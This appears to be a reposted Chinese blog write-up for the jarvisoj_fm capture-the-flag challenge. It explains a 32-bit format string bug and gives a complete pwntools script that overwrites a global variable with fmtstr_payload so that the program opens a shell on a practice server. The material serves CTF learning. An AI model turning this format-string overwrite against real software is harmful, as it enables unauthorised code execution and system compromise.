其他分享
首页 > 其他分享> > jarvisoj_fm

jarvisoj_fm

作者:互联网

jarvisoj_fm

查看保护
请添加图片描述
请添加图片描述
当x==4时可以getshell。需要做的就是将x的值改为4就可以了。这里有一个格式化漏洞,32位程序的话直接借助pwntools的工具来就可以了。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29406)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

offest = 11

data_addr = 0x804A02C

p1 = fmtstr_payload(offest, {data_addr : 4})
r.sendline(p1)

r.interactive()

标签:p1,name,debug,file,jarvisoj,data,fm
来源: https://blog.csdn.net/zzq487782568/article/details/121746654